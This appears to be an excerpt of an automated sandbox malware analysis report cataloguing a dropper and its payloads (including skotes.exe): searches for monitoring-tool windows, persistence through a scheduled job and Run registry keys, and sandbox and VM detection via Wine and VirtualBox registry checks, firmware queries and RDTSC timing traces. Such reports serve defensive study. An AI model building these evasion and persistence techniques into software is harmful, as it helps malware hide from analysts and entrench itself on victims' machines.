Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe	Window searched: window name: Regmonclass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe	Window searched: window name: Filemonclass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: Regmonclass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: Filemonclass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: Regmonclass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\DHMGC7TXSIK31JTC83MV8ND88A.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\DHMGC7TXSIK31JTC83MV8ND88A.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\DHMGC7TXSIK31JTC83MV8ND88A.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\DHMGC7TXSIK31JTC83MV8ND88A.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\DHMGC7TXSIK31JTC83MV8ND88A.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\DHMGC7TXSIK31JTC83MV8ND88A.exe	Window searched: window name: Regmonclass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\DHMGC7TXSIK31JTC83MV8ND88A.exe	Window searched: window name: Filemonclass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\DHMGC7TXSIK31JTC83MV8ND88A.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\DHMGC7TXSIK31JTC83MV8ND88A.exe	Window searched: window name: Regmonclass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	Window searched: window name: Filemonclass
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	Window searched: window name: Filemonclass
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1001606001\b0b9f39429.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1001606001\b0b9f39429.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1001606001\b0b9f39429.exe	Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\1001606001\b0b9f39429.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1001606001\b0b9f39429.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	Window searched: window name: Filemonclass
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1001606001\b0b9f39429.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1001606001\b0b9f39429.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1001606001\b0b9f39429.exe	Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\1001606001\b0b9f39429.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1001606001\b0b9f39429.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1001606001\b0b9f39429.exe	Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\C2C3IJZ3P2FG16GF7FNFB7ECDJXKRT.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\C2C3IJZ3P2FG16GF7FNFB7ECDJXKRT.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\C2C3IJZ3P2FG16GF7FNFB7ECDJXKRT.exe	Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\C2C3IJZ3P2FG16GF7FNFB7ECDJXKRT.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\C2C3IJZ3P2FG16GF7FNFB7ECDJXKRT.exe	Window searched: window name: PROCMON_WINDOW_CLASS

Creates job files (autostart)

Source: C:\Users\user\AppData\Local\Temp\6IF65DE3AL7UEH5E4W09DIZ.exe

File created: C:\Windows\Tasks\skotes.job

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run e192e43b61.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run e192e43b61.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run b0b9f39429.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run b0b9f39429.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 5e28f62265.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 5e28f62265.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run num.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run num.exe	Jump to behavior

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

Source: C:\Users\user\Desktop\file.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	Registry key monitored for changes: HKEY_CURRENT_USER_Classes

Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6IF65DE3AL7UEH5E4W09DIZ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\DHMGC7TXSIK31JTC83MV8ND88A.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\DHMGC7TXSIK31JTC83MV8ND88A.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\DHMGC7TXSIK31JTC83MV8ND88A.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\DHMGC7TXSIK31JTC83MV8ND88A.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\DHMGC7TXSIK31JTC83MV8ND88A.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\DHMGC7TXSIK31JTC83MV8ND88A.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\DHMGC7TXSIK31JTC83MV8ND88A.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\DHMGC7TXSIK31JTC83MV8ND88A.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\DHMGC7TXSIK31JTC83MV8ND88A.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\DHMGC7TXSIK31JTC83MV8ND88A.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\DHMGC7TXSIK31JTC83MV8ND88A.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\DHMGC7TXSIK31JTC83MV8ND88A.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\DHMGC7TXSIK31JTC83MV8ND88A.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\DHMGC7TXSIK31JTC83MV8ND88A.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\DHMGC7TXSIK31JTC83MV8ND88A.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\DHMGC7TXSIK31JTC83MV8ND88A.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1001607001\5e28f62265.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1001607001\5e28f62265.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1001607001\5e28f62265.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1001607001\5e28f62265.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Query firmware table information (likely to detect VMs)

Source: C:\Users\user\Desktop\file.exe	System information queried: FirmwareTableInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	System information queried: FirmwareTableInformation
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	System information queried: FirmwareTableInformation
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	System information queried: FirmwareTableInformation

Tries to detect sandboxes / dynamic malware analysis system (registry check)

Source: C:\Users\user\Desktop\file.exe	File opened: HKEY_CURRENT_USER\Software\Wine	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6IF65DE3AL7UEH5E4W09DIZ.exe	File opened: HKEY_CURRENT_USER\Software\Wine	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6IF65DE3AL7UEH5E4W09DIZ.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File opened: HKEY_CURRENT_USER\Software\Wine	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe	File opened: HKEY_CURRENT_USER\Software\Wine	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File opened: HKEY_CURRENT_USER\Software\Wine	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\DHMGC7TXSIK31JTC83MV8ND88A.exe	File opened: HKEY_CURRENT_USER\Software\Wine	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\DHMGC7TXSIK31JTC83MV8ND88A.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\1001606001\b0b9f39429.exe	File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\1001606001\b0b9f39429.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\1001606001\b0b9f39429.exe	File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\1001606001\b0b9f39429.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\C2C3IJZ3P2FG16GF7FNFB7ECDJXKRT.exe	File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\C2C3IJZ3P2FG16GF7FNFB7ECDJXKRT.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__

Tries to detect virtualization through RDTSC time measurements

Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5576D6 second address: 5576F1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 jbe 00007F40B515FC06h 0x0000000b jmp 00007F40B515FC00h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5576F1 second address: 557705 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F40B477E78Fh 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 557705 second address: 557725 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 jmp 00007F40B515FBFDh 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e jng 00007F40B515FC18h 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 popad 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 557725 second address: 557729 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 54EFFC second address: 54F008 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 54F008 second address: 54F00C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 54F00C second address: 54F010 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 54F010 second address: 54F016 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 54F016 second address: 54F046 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F40B515FC06h 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F40B515FC00h 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 55A272 second address: 55A28B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop esi 0x00000007 mov dword ptr [esp+04h], eax 0x0000000b jl 00007F40B477E794h 0x00000011 push eax 0x00000012 push edx 0x00000013 jo 00007F40B477E786h 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 55A2ED second address: 55A2F3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 55A2F3 second address: 55A3A3 instructions: 0x00000000 rdtsc 0x00000002 js 00007F40B477E788h 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov dword ptr [esp], eax 0x0000000f mov di, 327Ah 0x00000013 push 00000000h 0x00000015 push 00000000h 0x00000017 push ebp 0x00000018 call 00007F40B477E788h 0x0000001d pop ebp 0x0000001e mov dword ptr [esp+04h], ebp 0x00000022 add dword ptr [esp+04h], 00000017h 0x0000002a inc ebp 0x0000002b push ebp 0x0000002c ret 0x0000002d pop ebp 0x0000002e ret 0x0000002f push 86692ABCh 0x00000034 jmp 00007F40B477E797h 0x00000039 add dword ptr [esp], 7996D5C4h 0x00000040 add edx, dword ptr [ebp+122D38E9h] 0x00000046 push 00000003h 0x00000048 or dword ptr [ebp+122D3755h], esi 0x0000004e push 00000000h 0x00000050 jmp 00007F40B477E799h 0x00000055 push 00000003h 0x00000057 call 00007F40B477E790h 0x0000005c jmp 00007F40B477E78Ch 0x00000061 pop ecx 0x00000062 movzx edi, si 0x00000065 push 89954B9Fh 0x0000006a je 00007F40B477E794h 0x00000070 pushad 0x00000071 push eax 0x00000072 push edx 0x00000073 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 55A3A3 second address: 55A3D7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007F40B515FBF6h 0x0000000a popad 0x0000000b xor dword ptr [esp], 49954B9Fh 0x00000012 mov di, 5CECh 0x00000016 call 00007F40B515FBFBh 0x0000001b mov ecx, edx 0x0000001d pop edi 0x0000001e lea ebx, dword ptr [ebp+1244F1B3h] 0x00000024 xchg eax, ebx 0x00000025 jnl 00007F40B515FBFEh 0x0000002b push edx 0x0000002c push eax 0x0000002d push edx 0x0000002e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 55A508 second address: 55A522 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jne 00007F40B477E786h 0x00000009 pop esi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov eax, dword ptr [esp+04h] 0x00000010 push eax 0x00000011 push edx 0x00000012 jno 00007F40B477E788h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 55A522 second address: 55A539 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F40B515FBFCh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [eax] 0x0000000b push eax 0x0000000c push edx 0x0000000d push esi 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 55A539 second address: 55A53E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 55A639 second address: 55A63E instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 55A63E second address: 55A693 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov dword ptr [esp], eax 0x0000000a push 00000000h 0x0000000c push ebx 0x0000000d call 00007F40B477E788h 0x00000012 pop ebx 0x00000013 mov dword ptr [esp+04h], ebx 0x00000017 add dword ptr [esp+04h], 00000018h 0x0000001f inc ebx 0x00000020 push ebx 0x00000021 ret 0x00000022 pop ebx 0x00000023 ret 0x00000024 mov ecx, dword ptr [ebp+122D37EDh] 0x0000002a push 00000000h 0x0000002c sub dword ptr [ebp+122D3433h], esi 0x00000032 jne 00007F40B477E78Ah 0x00000038 call 00007F40B477E789h 0x0000003d jnp 00007F40B477E794h 0x00000043 push eax 0x00000044 push edx 0x00000045 pushad 0x00000046 popad 0x00000047 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 55A693 second address: 55A6A2 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F40B515FBF6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push esi 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 55A6A2 second address: 55A6B6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop esi 0x00000006 mov eax, dword ptr [esp+04h] 0x0000000a push eax 0x0000000b push edx 0x0000000c ja 00007F40B477E788h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 55A6B6 second address: 55A6EC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jne 00007F40B515FBF6h 0x00000009 jmp 00007F40B515FC01h 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 mov eax, dword ptr [eax] 0x00000013 push edx 0x00000014 jng 00007F40B515FBFCh 0x0000001a pop edx 0x0000001b mov dword ptr [esp+04h], eax 0x0000001f push eax 0x00000020 push edx 0x00000021 push edx 0x00000022 push eax 0x00000023 push edx 0x00000024 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 55A6EC second address: 55A6F1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 55A6F1 second address: 55A799 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F40B515FC0Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop eax 0x0000000b movsx esi, si 0x0000000e movzx edx, di 0x00000011 push 00000003h 0x00000013 push 00000000h 0x00000015 push edi 0x00000016 call 00007F40B515FBF8h 0x0000001b pop edi 0x0000001c mov dword ptr [esp+04h], edi 0x00000020 add dword ptr [esp+04h], 0000001Bh 0x00000028 inc edi 0x00000029 push edi 0x0000002a ret 0x0000002b pop edi 0x0000002c ret 0x0000002d sub dword ptr [ebp+122D1DF0h], esi 0x00000033 jmp 00007F40B515FC07h 0x00000038 push 00000000h 0x0000003a mov dword ptr [ebp+122D3515h], edi 0x00000040 push 00000003h 0x00000042 pushad 0x00000043 call 00007F40B515FC04h 0x00000048 mov edx, 6CA795B0h 0x0000004d pop ecx 0x0000004e xor dword ptr [ebp+122D1DF9h], ebx 0x00000054 popad 0x00000055 call 00007F40B515FBF9h 0x0000005a pushad 0x0000005b pushad 0x0000005c jl 00007F40B515FBF6h 0x00000062 push eax 0x00000063 push edx 0x00000064 rdtsc
